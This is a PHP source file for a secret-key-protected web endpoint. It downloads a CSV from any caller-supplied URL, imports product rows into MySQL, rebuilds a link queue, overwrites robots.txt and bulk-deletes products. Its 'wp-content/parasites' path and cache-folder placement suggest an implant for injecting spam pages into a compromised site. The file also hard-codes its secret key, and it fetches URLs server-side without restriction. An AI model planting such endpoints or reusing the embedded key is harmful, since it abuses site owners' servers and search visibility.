File: /home/sioberen/public_html/cache/import_csv.php
<?php
/**
* ===================================================================
* REMOTE CSV to MySQL Importer API
* ===================================================================
* This script acts as an API to import product data from a remote CSV
* file (via URL) into the MySQL database.
*
* It is protected by a secret key authentication.
*
* --- HOW TO USE ---
* Provide the full URL to a CSV file using the 'url' GET parameter
* and the secret key using the 'auth_token' parameter.
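* e.g., https://yourdomain.com/wp-content/parasites/import_csv.php?url=http://example.com/products.csv&auth_token=<URL-encoded secret key>
* Percent-encode the key (it contains reserved characters such as % and $) and never paste the real key into documentation.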
* ===================================================================
*/
// Every response produced by this script is a plain-text log.
header('Content-Type: text/plain; charset=utf-8');

// --- Configuration ---
// config.php is expected to provide DB_DSN, DB_USER, DB_PASS and ASITE_DOMAIN,
// which are referenced below but not defined in this file.
require_once __DIR__ . '/config.php';

// Shared secret that every request must send in the 'auth_token' GET parameter.
// NOTE(review): the secret is hard-coded in source; consider loading it from
// config.php or the environment and rotating it.
const SECRET_KEY = 'PtXe*JMQ%jT2HS!BSRc4a$$^';

// Table that receives imported rows and is trimmed by the cleanup action.
const TABLE_NAME = 'products';
// --- Helper Functions ---
/**
 * Rebuilds the link queue from scratch.
 *
 * Creates the link_queue and link_queue_pointer tables when they are missing,
 * empties link_queue, removes pointer row 1, enqueues every row id of every
 * table whose name matches "products%" (ids of each table are read in random
 * order), and finally writes pointer row 1 with current_index = 1 and the new
 * total.
 *
 * @param PDO  $pdo    Open database connection (the SQL used here is MySQL syntax).
 * @param bool $output When true, progress and error messages are echoed.
 * @return int|false Number of queued products, or false when any step threw.
 */
function initializeQueue($pdo, $output = true) {
    try {
        if ($output) echo "Starting queue initialization...\n";

        // Create queue tables
        $pdo->exec("
            CREATE TABLE IF NOT EXISTS link_queue (
                queue_index INT PRIMARY KEY AUTO_INCREMENT,
                product_id INT NOT NULL,
                table_name VARCHAR(50) NOT NULL,
                INDEX idx_queue_index (queue_index),
                INDEX idx_product_table (product_id, table_name)
            ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
        ");
        $pdo->exec("
            CREATE TABLE IF NOT EXISTS link_queue_pointer (
                id INT PRIMARY KEY DEFAULT 1,
                current_index INT NOT NULL DEFAULT 1,
                total_count INT NOT NULL DEFAULT 0,
                last_updated TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
            ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
        ");
        if ($output) echo "Queue tables created successfully.\n";

        // Clear existing queue
        $pdo->exec("TRUNCATE TABLE link_queue");
        $pdo->exec("DELETE FROM link_queue_pointer WHERE id = 1");

        // Get all product tables
        $tables = $pdo->query("SHOW TABLES LIKE 'products%'")->fetchAll(PDO::FETCH_COLUMN);
        if ($output) echo "Found " . count($tables) . " product tables.\n";

        $total_products = 0;
        $batch_size = 1000;
        $batch_values = array();
        $insert_prefix = "INSERT INTO link_queue (product_id, table_name) VALUES ";

        // Collect all product IDs from all tables
        foreach ($tables as $table) {
            if ($output) echo "Processing table: {$table}\n";

            // The table name comes from the database catalogue, but it is still data:
            // escape it both as an identifier and as a string literal before it is
            // spliced into SQL text.
            $table_identifier = '`' . str_replace('`', '``', $table) . '`';
            $table_literal = $pdo->quote($table);
            if ($table_literal === false) {
                throw new Exception("The database driver could not quote table name: " . $table);
            }

            $stmt = $pdo->query("SELECT id FROM {$table_identifier} ORDER BY RAND()");
            while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                $batch_values[] = "(" . (int)$row['id'] . ", " . $table_literal . ")";
                $total_products++;

                // Insert in batches for performance
                if (count($batch_values) >= $batch_size) {
                    $pdo->exec($insert_prefix . implode(',', $batch_values));
                    $batch_values = array();
                    if ($output) echo "Inserted batch, total so far: {$total_products}\n";
                }
            }
        }

        // Insert remaining items
        if (!empty($batch_values)) {
            $pdo->exec($insert_prefix . implode(',', $batch_values));
        }

        // Initialize pointer ($total_products is an integer counter, safe to inline)
        $pdo->exec("INSERT INTO link_queue_pointer (id, current_index, total_count) VALUES (1, 1, {$total_products}) ON DUPLICATE KEY UPDATE current_index = 1, total_count = {$total_products}");

        if ($output) echo "Queue initialization completed! Total products in queue: {$total_products}\n";
        return $total_products;
    } catch (Exception $e) {
        if ($output) echo "Error initializing queue: " . $e->getMessage() . "\n";
        error_log("Error initializing queue: " . $e->getMessage());
        return false;
    }
}
/**
 * Adds products that are not yet queued to link_queue without moving the pointer.
 *
 * Falls back to initializeQueue() when the link_queue table does not exist.
 * Otherwise it loads every existing "product_id-table_name" key into memory,
 * scans every table whose name matches "products%", appends the missing ids,
 * and refreshes total_count (or creates pointer row 1 when it is missing).
 *
 * @param PDO  $pdo    Open database connection (the SQL used here is MySQL syntax).
 * @param bool $output When true, progress and error messages are echoed.
 * @return int|false Number of products added (or the result of initializeQueue()
 *                   on the fallback path); false when any step threw.
 */
function updateQueueAfterImport($pdo, $output = true) {
    try {
        // Check if queue tables exist
        $tables_exist = $pdo->query("SHOW TABLES LIKE 'link_queue'")->fetchColumn();
        if (!$tables_exist) {
            if ($output) echo "Queue tables don't exist, performing full initialization...\n";
            return initializeQueue($pdo, $output);
        }

        if ($output) echo "Updating queue with new products (preserving current pointer)...\n";

        // Get current pointer position (preserve it); false means pointer row 1 is missing
        $pointer_stmt = $pdo->query("SELECT current_index FROM link_queue_pointer WHERE id = 1");
        $current_pointer = $pointer_stmt->fetchColumn();

        // Get all product tables
        $tables = $pdo->query("SHOW TABLES LIKE 'products%'")->fetchAll(PDO::FETCH_COLUMN);
        if ($output) echo "Found " . count($tables) . " product tables.\n";

        // Get current products in queue to avoid duplicates
        $existing_products = array();
        $existing_stmt = $pdo->query("SELECT CONCAT(product_id, '-', table_name) FROM link_queue");
        while (($queued_key = $existing_stmt->fetch(PDO::FETCH_COLUMN)) !== false) {
            $existing_products[$queued_key] = true;
        }

        $new_products = 0;
        $batch_size = 1000;
        $batch_values = array();
        $insert_prefix = "INSERT INTO link_queue (product_id, table_name) VALUES ";

        // Add only new products to queue
        foreach ($tables as $table) {
            if ($output) echo "Checking table: {$table} for new products\n";

            // The table name comes from the database catalogue, but it is still data:
            // escape it both as an identifier and as a string literal before it is
            // spliced into SQL text.
            $table_identifier = '`' . str_replace('`', '``', $table) . '`';
            $table_literal = $pdo->quote($table);
            if ($table_literal === false) {
                throw new Exception("The database driver could not quote table name: " . $table);
            }

            $stmt = $pdo->query("SELECT id FROM {$table_identifier}");
            while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                $product_key = $row['id'] . '-' . $table;

                // Only add if not already in queue
                if (isset($existing_products[$product_key])) {
                    continue;
                }

                $batch_values[] = "(" . (int)$row['id'] . ", " . $table_literal . ")";
                $new_products++;

                // Insert in batches for performance
                if (count($batch_values) >= $batch_size) {
                    $pdo->exec($insert_prefix . implode(',', $batch_values));
                    $batch_values = array();
                    if ($output) echo "Added batch, new products so far: {$new_products}\n";
                }
            }
        }

        // Insert remaining items
        if (!empty($batch_values)) {
            $pdo->exec($insert_prefix . implode(',', $batch_values));
        }

        // Update total count only if we added new products or if current pointer doesn't exist
        if ($new_products > 0 || $current_pointer === false) {
            $total_count = (int) $pdo->query("SELECT COUNT(*) FROM link_queue")->fetchColumn();

            if ($current_pointer !== false) {
                // Update total count while preserving current_index
                $pdo->prepare("UPDATE link_queue_pointer SET total_count = ? WHERE id = 1")->execute([$total_count]);
                if ($output) echo "Queue updated! Added {$new_products} new products. Total: {$total_count}. Pointer preserved at: {$current_pointer}\n";
            } else {
                // If no pointer exists, initialize it
                $pdo->exec("INSERT INTO link_queue_pointer (id, current_index, total_count) VALUES (1, 1, {$total_count})");
                if ($output) echo "Queue updated! Added {$new_products} new products. Total: {$total_count}. Pointer initialized at: 1\n";
            }
        } else {
            if ($output) echo "Queue is up to date. No new products to add. Pointer preserved at: {$current_pointer}\n";
        }

        return $new_products;
    } catch (Exception $e) {
        if ($output) echo "Error updating queue: " . $e->getMessage() . "\n";
        error_log("Error updating queue: " . $e->getMessage());
        return false;
    }
}
/**
 * Writes robots.txt with a Sitemap line pointing at https://<host>/sitemap.xml.
 *
 * Despite the name, no sitemap file is generated here: only robots.txt is
 * written, two directory levels above this script's directory. The host is
 * taken from the ASITE_DOMAIN constant.
 *
 * @param PDO|null $pdo    Unused; kept so existing callers keep working.
 * @param bool     $output When true, progress and error messages are echoed.
 * @return bool True on success, false when the host cannot be determined or
 *              the file cannot be written.
 */
function generateSitemap($pdo = null, $output = true) {
    try {
        // No-op when config.php is already loaded; kept so ASITE_DOMAIN is
        // available even if this function is reached before the top-level require.
        require_once __DIR__ . '/config.php';

        // The previous isset($host) check could never succeed inside this function
        // scope, so the host has always come from ASITE_DOMAIN.
        if (!defined('ASITE_DOMAIN')) {
            throw new Exception("ASITE_DOMAIN is not defined in config.php.");
        }
        $site = trim((string) ASITE_DOMAIN);
        $domain = parse_url($site, PHP_URL_HOST);
        if (empty($domain)) {
            // A value without a scheme (e.g. "example.com") is parsed as a path, not
            // a host; retry with a scheme instead of emitting "https:///sitemap.xml".
            $domain = parse_url('https://' . ltrim($site, '/'), PHP_URL_HOST);
        }
        if (empty($domain)) {
            throw new Exception("Could not determine the site host from ASITE_DOMAIN.");
        }

        // Only robots.txt is generated; the sitemap itself is served dynamically.
        $robots = "User-agent: *\nAllow: /\n";
        $robots .= "Sitemap: https://" . $domain . "/sitemap.xml";

        // NOTE(review): two levels above this directory — confirm this is the web root.
        $robots_file = dirname(__DIR__, 2) . '/robots.txt';

        // Always overwrite the existing file.
        if (file_put_contents($robots_file, $robots) === false) {
            throw new Exception("Failed to write robots.txt file to: " . $robots_file);
        }

        if ($output) echo "Robots.txt written to: " . $robots_file . "\n";
        if ($output) echo "Content: " . $robots . "\n";
        if ($output) echo "Robots.txt updated successfully. Sitemap is now dynamic.\n";
        return true;
    } catch (Exception $e) {
        if ($output) echo "Error generating robots.txt: " . $e->getMessage() . "\n";
        error_log("Error generating robots.txt: " . $e->getMessage());
        return false;
    }
}
// --- Queue Management Interface ---
// GET ?action=init_queue&auth_token=...  Rebuilds the link queue from scratch.
if (isset($_GET['action']) && $_GET['action'] === 'init_queue') {
    // Constant-time comparison; the is_string guard rejects array-valued parameters,
    // which hash_equals() would otherwise reject with a TypeError.
    $auth_token = isset($_GET['auth_token']) ? $_GET['auth_token'] : null;
    if (!is_string($auth_token) || !hash_equals(SECRET_KEY, $auth_token)) {
        http_response_code(401);
        exit("Authentication failed.\n");
    }

    // The rebuild scans every product table, so lift the execution time limit.
    set_time_limit(0);

    // A failed connection used to surface as an uncaught exception; report it as a 500.
    try {
        $pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        http_response_code(500);
        error_log("Queue initialization error: " . $e->getMessage());
        echo "Error connecting to the database: " . $e->getMessage() . "\n";
        exit;
    }

    // initializeQueue() reports its own errors and returns false on failure.
    $result = initializeQueue($pdo, true);
    if ($result === false) {
        http_response_code(500);
    }
    exit;
}
// --- Sitemap Generation Interface ---
// GET ?action=sitemap&auth_token=...  Rewrites robots.txt via generateSitemap().
if (isset($_GET['action']) && $_GET['action'] === 'sitemap') {
    // Authenticate before producing any output: once output has been sent the 401
    // status can no longer be set, and unauthenticated callers should see nothing else.
    $auth_token = isset($_GET['auth_token']) ? $_GET['auth_token'] : null;
    if (!is_string($auth_token) || !hash_equals(SECRET_KEY, $auth_token)) {
        http_response_code(401);
        exit("Authentication failed.\n");
    }

    // Buffer the short log so a failure below can still set the 500 status;
    // the buffer is flushed automatically when the script exits.
    ob_start();
    try {
        echo "Starting sitemap generation...\n";
        echo "Authentication successful.\n";
        echo "Generating robots.txt...\n";

        $result = generateSitemap(null, true);
        if ($result === false) {
            http_response_code(500);
            exit("Robots.txt generation failed.\n");
        }

        echo "robots.txt updated successfully.\n";
        exit;
    } catch (Exception $e) {
        http_response_code(500);
        echo "Error: " . $e->getMessage() . "\n";
        error_log("Sitemap generation error: " . $e->getMessage());
        exit;
    }
}
// --- Product Cleanup Interface ---
// GET ?action=cleanup_products&auth_token=...[&keep=N]
// Deletes every row of TABLE_NAME except the N rows with the highest ids
// (default 700000), then rebuilds the link queue and robots.txt.
if (isset($_GET['action']) && $_GET['action'] === 'cleanup_products') {
    // Constant-time comparison; the is_string guard rejects array-valued parameters.
    $auth_token = isset($_GET['auth_token']) ? $_GET['auth_token'] : null;
    if (!is_string($auth_token) || !hash_equals(SECRET_KEY, $auth_token)) {
        http_response_code(401);
        exit("Authentication failed.\n");
    }

    try {
        // Define how many of the latest products you want to keep.
        // Only whole numbers >= 1 are accepted. The previous is_numeric() + (int) cast
        // turned values such as "0.5" into 0, which made the DELETE below wipe the table.
        $products_to_keep = 700000;
        if (isset($_GET['keep'])) {
            $requested_keep = filter_var(
                $_GET['keep'],
                FILTER_VALIDATE_INT,
                ['options' => ['min_range' => 1]]
            );
            if ($requested_keep !== false) {
                $products_to_keep = $requested_keep;
            } else {
                echo "Ignoring invalid 'keep' value; using the default of {$products_to_keep}.\n";
            }
        }

        echo "Starting product cleanup process...\n";
        echo "The goal is to keep the latest {$products_to_keep} products.\n\n";

        // For long-running operations
        set_time_limit(0);

        $pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        echo "Successfully connected to the database.\n";

        // First, count the total number of products
        $count_stmt = $pdo->query("SELECT COUNT(*) FROM " . TABLE_NAME);
        $total_products = (int) $count_stmt->fetchColumn();
        echo "Found {$total_products} total products in the table.\n";

        if ($total_products <= $products_to_keep) {
            exit("No cleanup needed. The number of products ({$total_products}) is already at or below the target of {$products_to_keep}.\n");
        }

        // Delete all records EXCEPT the $products_to_keep newest ones (ordered by id descending).
        // The LEFT JOIN against a derived table identifies the rows to delete and avoids
        // MySQL's restriction on selecting from the table being modified in a subquery.
        // $products_to_keep is a validated integer, so it is safe to inline in LIMIT.
        $sql = "
            DELETE p1 FROM " . TABLE_NAME . " AS p1
            LEFT JOIN (
                SELECT id FROM " . TABLE_NAME . " ORDER BY id DESC LIMIT " . $products_to_keep . "
            ) AS p2 ON p1.id = p2.id
            WHERE p2.id IS NULL;
        ";

        echo "Executing deletion query. This may take some time...\n";

        // Execute the query and get the number of deleted rows
        $deleted_count = $pdo->exec($sql);

        echo "\nCleanup Complete!\n";
        echo "Successfully deleted {$deleted_count} old products.\n";

        $final_count_stmt = $pdo->query("SELECT COUNT(*) FROM " . TABLE_NAME);
        $final_total_products = (int) $final_count_stmt->fetchColumn();
        echo "There are now {$final_total_products} products remaining in the table.\n";

        // Auto-rebuild queue system after cleanup (deleted ids must leave the queue)
        echo "\n=== Auto-rebuilding Queue System ===\n";
        $queue_result = initializeQueue($pdo, true);
        if ($queue_result !== false) {
            echo "\n=== Auto-generating Sitemap ===\n";
            $sitemap_result = generateSitemap($pdo, true);
            if ($sitemap_result !== false) {
                echo "robots.txt updated.\n";
            }
        }
    } catch (Exception $e) {
        http_response_code(500);
        error_log("Error during product cleanup: " . $e->getMessage());
        echo "\nAN ERROR OCCURRED during cleanup:\n";
        echo $e->getMessage() . "\n";
    }
    exit;
}
// --- Main Logic ---
// Default action: download the CSV named by the 'url' GET parameter, upsert its
// rows into TABLE_NAME, add new ids to the link queue, then refresh the queue
// and robots.txt.
//
// The queue_status action is handled by a block placed after this one in the
// file, so the import is skipped for it. Previously such a request ran the
// import first and picked up a spurious error and 500 status.
$temp_file_path = null; // Initialize to null
$fileHandle = null;     // CSV read handle; released in the finally block on errors
$error_status = 500;    // HTTP status reported by the catch block below
$is_queue_status_request = isset($_GET['action']) && $_GET['action'] === 'queue_status';

if (!$is_queue_status_request) {
    try {
        // 0. Authenticate the request (constant-time comparison; arrays are rejected)
        $auth_token = isset($_GET['auth_token']) ? $_GET['auth_token'] : null;
        if (!is_string($auth_token) || !hash_equals(SECRET_KEY, $auth_token)) {
            // Remember the status here: the catch block sets the response code, and it
            // used to overwrite the 401 with a 500.
            $error_status = 401; // Unauthorized
            throw new Exception("Authentication failed. Invalid or missing authentication token.");
        }
        echo "Authentication successful.\n";

        // 1. Get and validate the remote CSV URL from the GET parameter
        if (!isset($_GET['url']) || !is_string($_GET['url']) || empty($_GET['url'])) {
            throw new Exception("Mandatory 'url' GET parameter is missing. Please provide the URL of the CSV file.");
        }
        $remote_csv_url = $_GET['url'];
        if (filter_var($remote_csv_url, FILTER_VALIDATE_URL) === false) {
            throw new Exception("Invalid URL format provided: " . htmlspecialchars($remote_csv_url));
        }
        $url_parts = parse_url($remote_csv_url);
        if (!isset($url_parts['scheme']) || !in_array($url_parts['scheme'], ['http', 'https'], true)) {
            throw new Exception("Invalid URL scheme. Only HTTP and HTTPS URLs are allowed.");
        }
        echo "Processing URL: " . htmlspecialchars($remote_csv_url) . "\n\n";

        // 2. Download the remote file to a temporary local file
        // NOTE(review): the server fetches any http(s) URL an authenticated caller
        // supplies, including internal addresses — restrict hosts if that matters.
        $temp_file_path = tempnam(sys_get_temp_dir(), 'csv_import_');
        if ($temp_file_path === false) {
            throw new Exception("Could not create temporary file.");
        }
        // The warning is suppressed because the failure reason is read from error_get_last().
        $success = @copy($remote_csv_url, $temp_file_path);
        if (!$success) {
            $error = error_get_last();
            $error_message = isset($error['message']) ? $error['message'] : 'Unknown error';
            throw new Exception("Failed to download remote CSV file. Reason: " . $error_message);
        }
        echo "Successfully downloaded remote file to temporary location.\n";

        // 3. Connect to MySQL Database
        $pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        echo "Successfully connected to the database.\n";

        // 4. Create the products table ONLY if it doesn't exist.
        $pdo->exec("
            CREATE TABLE IF NOT EXISTS " . TABLE_NAME . " (
                id INT PRIMARY KEY,
                title TEXT,
                price_current DECIMAL(10, 2),
                price_original DECIMAL(10, 2),
                description LONGTEXT,
                images TEXT,
                category TEXT,
                source_url TEXT,
                crawled_at VARCHAR(255),
                status VARCHAR(50)
            ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
        ");

        // Create index with error handling for MySQL compatibility
        try {
            $pdo->exec("CREATE INDEX idx_category ON " . TABLE_NAME . " (category(255))");
        } catch (PDOException $e) {
            // Index might already exist, ignore error 1061 (Duplicate key name)
            if ($e->getCode() != '42000' || strpos($e->getMessage(), 'Duplicate key name') === false) {
                throw $e;
            }
        }
        echo "Database table '" . TABLE_NAME . "' is ready.\n";

        // 5. Read the temporary CSV and insert/update data
        $fileHandle = fopen($temp_file_path, 'r');
        if ($fileHandle === false) {
            throw new Exception("Could not open temporary CSV file.");
        }

        // Skip the header row of the CSV
        fgetcsv($fileHandle);

        $stmt = $pdo->prepare(
            "REPLACE INTO " . TABLE_NAME . " (id, title, price_current, price_original, description, images, category, source_url, crawled_at, status)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
        );

        // Prepare queue management statements
        $check_queue_stmt = $pdo->prepare("SELECT 1 FROM link_queue WHERE product_id = ? AND table_name = ? LIMIT 1");
        $insert_queue_stmt = $pdo->prepare("INSERT INTO link_queue (product_id, table_name) VALUES (?, ?)");
        $update_count_stmt = $pdo->prepare("UPDATE link_queue_pointer SET total_count = total_count + 1 WHERE id = 1");

        $rowCount = 0;
        $newProductsInQueue = 0;

        $pdo->beginTransaction();
        while (($row = fgetcsv($fileHandle)) !== false) {
            // Rows that do not have exactly the 10 expected columns are skipped.
            if (count($row) !== 10) {
                continue;
            }

            $product_id = (int)$row[0];
            $stmt->execute($row);
            $rowCount++;

            // Check if queue tables exist and add new products to queue
            try {
                $check_queue_stmt->execute([$product_id, TABLE_NAME]);
                $exists = $check_queue_stmt->fetch();
                if (!$exists) {
                    $insert_queue_stmt->execute([$product_id, TABLE_NAME]);
                    $update_count_stmt->execute();
                    $newProductsInQueue++;
                }
            } catch (PDOException $e) {
                // Queue tables might not exist yet, ignore queue operations
                if ($e->getCode() != '42S02') { // Table doesn't exist error
                    error_log("Queue maintenance error: " . $e->getMessage());
                }
            }
        }
        $pdo->commit();

        fclose($fileHandle);
        $fileHandle = null;

        echo "\nImport Complete!\n";
        echo "Successfully processed " . $rowCount . " products from " . htmlspecialchars(basename($remote_csv_url)) . ".\n";
        if ($newProductsInQueue > 0) {
            echo "Added " . $newProductsInQueue . " new products to link queue.\n";
        }

        // Auto-update queue and sitemap after import (preserving pointer position)
        echo "\n=== Auto-updating Queue System ===\n";
        $queue_result = updateQueueAfterImport($pdo, true);
        if ($queue_result !== false) {
            echo "\n=== Auto-generating Sitemap ===\n";
            $sitemap_result = generateSitemap($pdo, true);
            if ($sitemap_result !== false) {
                echo "robots.txt updated.\n";
            }
        }
    } catch (Exception $e) {
        http_response_code($error_status);
        error_log("CSV import error: " . $e->getMessage());
        echo "\nAN ERROR OCCURRED:\n";
        echo $e->getMessage() . "\n";
        if (isset($pdo) && $pdo->inTransaction()) {
            $pdo->rollBack();
            echo "Database transaction has been rolled back.\n";
        }
    } finally {
        // 6. Clean up: close the CSV handle if an error left it open, then always
        // delete the temporary file if it was created.
        if (is_resource($fileHandle)) {
            fclose($fileHandle);
        }
        if ($temp_file_path && file_exists($temp_file_path)) {
            unlink($temp_file_path);
            echo "\nTemporary file has been deleted.\n";
        }
    }
}
// --- Queue Status Check Interface (for debugging) ---
// GET ?action=queue_status&auth_token=...
// Prints the pointer row, the recorded vs. actual queue size, and the queue
// entries in the five index positions starting at the current pointer.
if (isset($_GET['action']) && $_GET['action'] === 'queue_status') {
    // Constant-time comparison; the is_string guard rejects array-valued parameters.
    $auth_token = isset($_GET['auth_token']) ? $_GET['auth_token'] : null;
    if (!is_string($auth_token) || !hash_equals(SECRET_KEY, $auth_token)) {
        http_response_code(401);
        exit("Authentication failed.\n");
    }

    try {
        $pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

        // Check if queue tables exist
        $tables_exist = $pdo->query("SHOW TABLES LIKE 'link_queue'")->fetchColumn();
        if (!$tables_exist) {
            echo "Queue tables do not exist yet.\n";
            exit;
        }

        // Get pointer status
        $pointer_stmt = $pdo->query("SELECT current_index, total_count, last_updated FROM link_queue_pointer WHERE id = 1");
        $pointer_data = $pointer_stmt->fetch(PDO::FETCH_ASSOC);
        if (!$pointer_data) {
            echo "Queue pointer not initialized.\n";
            exit;
        }

        // Get actual queue count
        $actual_count_stmt = $pdo->query("SELECT COUNT(*) FROM link_queue");
        $actual_count = $actual_count_stmt->fetchColumn();

        // Get sample products from current pointer position. queue_index is selected
        // too so each line shows the row's real index even if the range has gaps.
        $current_index = (int)$pointer_data['current_index'];
        $sample_stmt = $pdo->prepare("
            SELECT queue_index, product_id, table_name
            FROM link_queue
            WHERE queue_index >= ? AND queue_index < ?
            ORDER BY queue_index
        ");
        $sample_stmt->execute([$current_index, $current_index + 5]);
        $sample_products = $sample_stmt->fetchAll(PDO::FETCH_ASSOC);

        echo "=== Queue Status Report ===\n";
        echo "Current Pointer Position: {$pointer_data['current_index']}\n";
        echo "Recorded Total Count: {$pointer_data['total_count']}\n";
        echo "Actual Queue Count: {$actual_count}\n";
        echo "Last Updated: {$pointer_data['last_updated']}\n";
        echo "Count Match: " . ($pointer_data['total_count'] == $actual_count ? "✓ YES" : "✗ NO") . "\n";
        echo "\nNext 5 products from current pointer:\n";
        foreach ($sample_products as $product) {
            echo " " . (int)$product['queue_index'] . ": Product #{$product['product_id']} from {$product['table_name']}\n";
        }
    } catch (Exception $e) {
        http_response_code(500);
        echo "Error checking queue status: " . $e->getMessage() . "\n";
    }
    exit;
}
?>